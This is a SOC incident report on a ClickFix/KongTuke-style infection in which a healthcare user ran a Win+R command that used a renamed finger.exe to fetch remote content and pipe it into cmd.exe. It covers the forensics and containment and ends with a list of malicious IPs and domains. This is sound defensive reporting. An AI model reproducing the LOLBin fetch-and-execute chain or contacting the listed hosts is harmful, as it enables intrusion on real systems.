ClickFix / KongTuke-Style User-Assisted Malware Execution

ClickFix / KongTuke-Style User-Assisted Malware Execution

ClickFix / KongTuke-Style User-Assisted Malware Execution

(Win+R LOLBin Chain)

On January 22, 2026, the Security Operations Center (SOC) completed an investigation into a medium-severity malware alert affecting an endpoint of one healthcare organization.

The activity was confirmed as a user-assisted execution consistent with ClickFix-style social engineering, where a user is tricked into manually running a command via the Windows Run dialog (Win+R).

The observed behavior matched the broader KongTuke-style tradecraft documented publicly by Huntress, featuring a multi-stage Living-off-the-Land (LOTL) chain designed to look benign unless correlated end-to-end.

No evidence of persistence, lateral movement, or ongoing attacker activity was identified; the impact appears isolated to the user profile on the affected device.

What Happened?

The alert originated from suspicious command execution activity on the endpoint; initial triage was delayed and the host had been rebooted prior to investigation, increasing the need for host-level artifact validation.

Forensic triage confirmed a RunMRU registry entry under the impacted user profile containing the exact command executed via Win+R, a strong indication that the action was manually performed by the user.

The execution chain showed classic ClickFix/KongTuke overlap:

    A legitimate Windows utility (finger.exe) was copied to a temp location and renamed (LOTL camouflage).
    The renamed binary was executed to retrieve attacker-controlled content from a remote IP.
    Retrieved content was piped directly into cmd.exe for execution, forming a staged, multi-step chain where the malicious intent becomes clear only through correlation.

Corroborating artifacts (including UserAssist evidence of cmd.exe execution in user context and Prefetch confirming execution of cmd.exe and powershell.exe) further supported the RunMRU-confirmed sequence.

This behavior aligns closely with public reporting on KongTuke campaigns (e.g., Huntress “KongTuke’s New Toy”), where users are coerced into running “fix” commands, and attackers rely on trusted system tools to avoid early-stage blocking.

How Was It Addressed?

Incident Response and Containment
Following confirmation of user-assisted execution, the endpoint was network-contained to prevent any potential follow-on actions or external communication.
The affected user’s credentials were reset, access was temporarily restricted, and the device was approved for full reimage to return it to a known-good state.

DFIR Validation (Negative Evidence)
Because containment and elapsed time can hide transient attacker activity, the SOC also performed live-response validation to assess whether persistence or residual tooling existed.
During DFIR collection, the team gathered running processes, scheduled tasks, services, and network connections, and used a targeted artifact-collection script to extract key user-execution evidence (e.g., RunMRU, TypedPaths, HKCU Run keys, and PowerShell PSReadLine history) from user profiles for review.
No unauthorized tasks or services, no anomalous processes, and no suspicious network connections were observed at the time of collection, supporting the conclusion that the incident was opportunistic, non-persistent, and limited in scope.

Lessons Learned and Improvements

    Behavioral correlation beats single alerts: High-confidence detection in this class often depends on linking user-action artifacts (e.g., RunMRU) to process and network activity.
    LOTL reduces early friction for attackers: Abuse of legitimate utilities can appear policy-compliant until the full execution chain is reconstructed.
    User awareness remains critical: ClickFix-style lures exploit urgency and trust, making training and context-aware controls essential.

Conclusion

This incident represents a confirmed user-assisted ClickFix-style execution with no evidence of persistence or spread beyond a single user profile on one device.

Containment actions were completed, credentials were reset, and reimaging was approved to fully eliminate residual risk.

The outcome reinforces that modern campaigns increasingly rely on human-in-the-loop execution and LOTL tradecraft, making correlation-driven telemetry and user-focused awareness essential.

The list of malicious IP addresses and URLs found after the investigation:

IP list Domain list
199.217.98.108 ieeikebjanfiemm[.]top
64.52.80.153 8znu232kmuenkxm[.]top
146.112.47.62 fyvw2oiv[.]top
146.112.61.107  

The SOCcare project is co-funded by the European Union, alongside our collaborators University POLITEHNICA of Bucharest and NRD Cyber Security, and supported by the European Cybersecurity Competence Centre (ECCC) under Grant Agreement No. a101145843.